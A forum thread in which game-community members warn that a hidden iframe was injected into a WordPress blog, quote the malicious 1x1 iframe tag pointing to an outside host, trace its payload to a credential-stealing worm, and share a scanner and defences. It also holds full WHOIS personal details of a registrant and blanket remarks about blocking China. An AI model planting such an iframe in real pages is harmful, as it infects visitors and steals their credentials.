  1. #1
    Black Belt

    Gillsellers now going after wordpress blog

    I think this one is a lot bigger than ffxi.somepage etc since it was just one site. I was checking my website when AVG popped up, along with IE with some remote access crap. Apparently now, gilsellers are targeting WordPress blogs. They successfully added an iframe to my linkshell's blog. The code is the following.

    <iframe src=http://www.wp-stats-php.info/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>

    IE7 (Vista) asked me if I wanted this code to run; I, of course, said no. Firefox does not prompt anything but requests/sends data to s81.cnzz.com. When you go there, you have Chinese webmasters something something ;w;

    http://i244.photobucket.com/albums/g...g?t=1198988409

    A lot of people use wordpress for blogs/ffxi related stuff so I recommend you guys check and see if anything is funny.
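
An added example (not part of the original post) of one way to run the check suggested above: a Python scan of saved page HTML for iframes that are effectively invisible and load from a host other than your own. The hostnames and the sample page are constructed placeholders, and the "hidden" thresholds (width or height of 0 or 1, or a hiding style) are assumptions.

```python
# Added example: flag near-invisible, off-site iframes in saved page HTML.
from html.parser import HTMLParser
from urllib.parse import urlparse


def _tiny(value):
    """True when a width/height attribute is 0 or 1 (optionally with 'px')."""
    digits = (value or "").strip().lower().replace("px", "")
    return digits.isdigit() and int(digits) <= 1


class IframeFinder(HTMLParser):
    def __init__(self, own_host):
        super().__init__()
        self.own_host = own_host.lower()
        self.findings = []  # (line number, host, src)

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        src = a.get("src", "")
        host = (urlparse(src).hostname or "").lower()
        style = a.get("style", "").replace(" ", "").lower()
        hidden = (_tiny(a.get("width")) or _tiny(a.get("height"))
                  or "display:none" in style or "visibility:hidden" in style)
        same_site = host == self.own_host or host.endswith("." + self.own_host)
        if hidden and host and not same_site:
            self.findings.append((self.getpos()[0], host, src))


def find_hidden_iframes(html, own_host):
    """Return findings for iframes that are hidden and load from another host."""
    finder = IframeFinder(own_host)
    finder.feed(html)
    finder.close()
    return finder.findings


# Constructed sample page: one normal embed, one iframe shaped like the
# injected tag quoted in the post (unquoted attributes, 1x1, placeholder host).
SAMPLE = """<html><body>
<h1>Linkshell news</h1>
<iframe src="https://video.example/embed/1" width="560" height="315"></iframe>
<iframe src=http://stats.injected.example/iframe/x.php width=1 height=1 frameborder=0></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host, src in find_hidden_iframes(SAMPLE, "myblog.example"):
        print(f"line {line}: hidden iframe loading from {host} ({src})")
```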

  2. #2
    Fake Numbers

    My question is does this shit still do anything if you've got NoScript running? I'm pretty illiterate about this kind of stuff.

  3. #3
    Banned.


    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the default configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

  4. #4
    Black Belt

    Quote Originally Posted by Tajin
    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the default configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

    zigmals.com

    I haven't finished moving my webpage over and prob won't in a while.

  5. #5
    Fishing Guru

    Quote Originally Posted by Tajin
    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the default configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

    I'm looking in Adblock Plus preferences (Tools>Adblock Plus) and I do not see anything about allowing or denying iframes. Where exactly do I go to specify that I do not want iframes allowed?

  6. #6
    Pens win! Pens Win!!! PENS WIN!!!!!

    Are they just posting links in blogs? I'm confused.

  7. #7
    Fake Numbers

    Quote Originally Posted by cdgreguh
    Quote Originally Posted by Tajin
    Will depend on your NoScript configuration.

    Edit: Just visited zigma site, and this comes up on NoScript. I have it configured to deny IFRAMES, which is the only extra stuff from the default configuration.

    Fatal error: Call to undefined function wp() in /[Directory tree edited by me]/wp-blog-header.php on line 18

    I'm looking in Adblock Plus preferences (Tools>Adblock Plus) and I do not see anything about allowing or denying iframes. Where exactly do I go to specify that I do not want iframes allowed?

    NoScript is a different add-on, it's not Adblock.

  8. #8
    Black Belt

    Quote Originally Posted by vagus
    Are they just posting links in blogs? I'm confused.

    No, I'm not exactly sure, but I believe they're using a vulnerability in WordPress to do SQL injections. I have to look over my MySQL logs to see where exactly.

  9. #9
    Hydra

    http://wordpress.org/support/topic/134928 - some discussion about the bug; funny that the developers closed the bug report citing not enough info. It should be the developers' responsibility to reproduce this.

    Looks like the wp-stats-php.info guy deleted the file; it's zero bytes now, unless they're making it so that you can't get to it with wget/lynx/Firefox in Linux.

    http://www.popov-roman.com/blog/prog...statistics-gt/ - I can't read the website's language nor any of the websites to which it links, but looks like some discussion on this iframe exploit.

  10. #10
    Salvage Bans

    I've seen this on a lot of random sites, don't even know if they have anything to do with FFXI, but yeah, I have them blocked via NoScript.

  11. #11
    Sea Torques

    Do you use the public Wordpress hosting, or is your site hosted yourself on a private server?

    I have all my comments set to moderate, and I've gotten a bunch of gil-selling spam, which I promptly delete. I'm more concerned if this was done through comments or if they actually hacked and altered your coding on the actual page? My page is privately hosted, and if the latter is the case I need to contact my webhost admin (my ex-boyfriend -.-) to poke around and make things more secure for me.

  12. #12


    Domain ID:D22443415-LRMS
    Domain Name:WP-STATS-PHP.INFO
    Created On:22-Nov-2007 13:45:05 UTC
    Last Updated On:22-Nov-2007 13:45:07 UTC
    Expiration Date:22-Nov-2008 13:45:05 UTC
    Sponsoring Registrar:Gandi Sarl (R191-LRMS)
    Status:CLIENT TRANSFER PROHIBITED
    Status:TRANSFER PROHIBITED
    Registrant ID:O-901894-GANDI
    Registrant Name:No
    Registrant Organization:Ju Dehua
    Registrant Street1:B1/4F., No. 211, Taigu Road, Waigaoqiao Free Trade Zone
    Registrant City:Shanghai
    Registrant Postal Code:10079
    Registrant Country:CN CN = China's Country Code; Like USA = United States
    Registrant Phone:+86.2158681248
    Registrant Email:[email protected]
    Admin ID:C11388674-LRMS
    Admin Name:Ju Dehua
    Admin Street1:B1/4F., No. 211, Taigu Road, Waigaoqiao Free Trade
    Admin Street2:Zone
    Admin City:Shanghai
    Admin State/Province:
    Admin Postal Code:10079
    Admin Country:CN
    Admin Phone:+86.2158681248
    Admin Email:[email protected]


    Billing ID:C1249598-LRMS
    Billing Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
    Billing Organization:GANDI sarl
    Billing Street1:see also whois.gandi.net
    Billing City:Paris
    Billing Postal Code:F-75003
    Billing Country:FR
    Billing Email:[email protected]
    Tech ID:C1249598-LRMS
    Tech Name:CONTACT NOT AUTHORITATIVE see http://www.gandi.net/whois
    Tech Organization:GANDI sarl
    Tech Street1:see also whois.gandi.net
    Tech City:Paris
    Tech State/Province:
    Tech Postal Code:F-75003
    Tech Country:FR
    Tech Email:[email protected]
    Name Server:C.DNS.GANDI.NET
    Name Server:B.DNS.GANDI.NET
    Name Server:A.DNS.GANDI.NET


    Have at it. Best I can do from work and nothing from Taj yet.
    EDIT>> Edited out blank fields.

  13. #13
    I Have The Clap Again

    Yes, I visit some Bahamut ls websites since it was my home when the game 1st came out and Ridexru's site always tries to run some crazy shit and my spyware starts blocking shit... I just figured it was an add-on the mod wanted people to run but I never clicked it.

  14. #14
    Black Belt

    Quote Originally Posted by Bardlet
    Do you use the public Wordpress hosting, or is your site hosted yourself on a private server?

    I have all my comments set to moderate, and I've gotten a bunch of gil-selling spam, which I promptly delete. I'm more concerned if this was done through comments or if they actually hacked and altered your coding on the actual page? My page is privately hosted, and if the latter is the case I need to contact my webhost admin (my ex-boyfriend -.-) to poke around and make things more secure for me.

    It's private.

  15. #15
    Cerberus

    I usually report malware sites to their ISP/datacenter, unless it's in China.

    I don't even bother wasting my time on Chinese sites.

  16. #16
    New Odin

    Meh, where most of the attacks are originating from

  17. #17


    Quote Originally Posted by Aikar
    I usually report malware sites to their ISP/datacenter, unless it's in China.

    I don't even bother wasting my time on Chinese sites.

    Yeah, it's why I posted it here.
    Pointless to report a site from China.

  18. #18
    Puppetmaster

    If you run your own website and are concerned about security, one option you have is likely using a service like: http://www.trafficcleaner.com
    ...where you insert a bit of code onto your page and it blocks the whole country of China.
    You might end up blocking a legit user in China in the process but those are very minimal :3

    You can also make your own custom list using a .htaccess file on your server and blocking off originating regions, like Shanghai.

  19. #19
    New Spam Forum

    I unescaped the code best I could and came up with this:

    http://pastebin.com/mefb7452

    Notice mscass.exe in there?

    http://www.trendmicro.com/vinfo/virusen ... YG&VSect=P

    Description:

    This worm may arrive via network shares.

    It searches the network for certain shares, into which it attempts to drop copies of itself.

    It takes advantage of software vulnerabilities to propagate across networks.

    It opens ports.

    It connects to IRC servers.

    It joins IRC channels.

    It executes commands from a remote malicious user.

    It steals sensitive information, such as user names and passwords, related to certain games.

    It terminates certain processes, if found running in memory.

  20. #20
    Puppetmaster

    Hmmm, fix one thing and they attack using something else, persistent bunch.
